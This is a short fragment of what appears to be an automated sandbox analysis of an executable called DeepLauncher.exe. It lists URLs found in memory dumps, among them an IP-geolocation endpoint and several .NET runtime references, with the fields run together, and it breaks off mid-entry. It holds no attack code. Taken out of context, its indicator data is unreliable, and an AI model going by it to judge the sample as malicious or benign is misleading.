00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ip-api.com/json/DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oDeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://aka.ms/nativeaot-compatibilityDeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/dotnet/runtime/is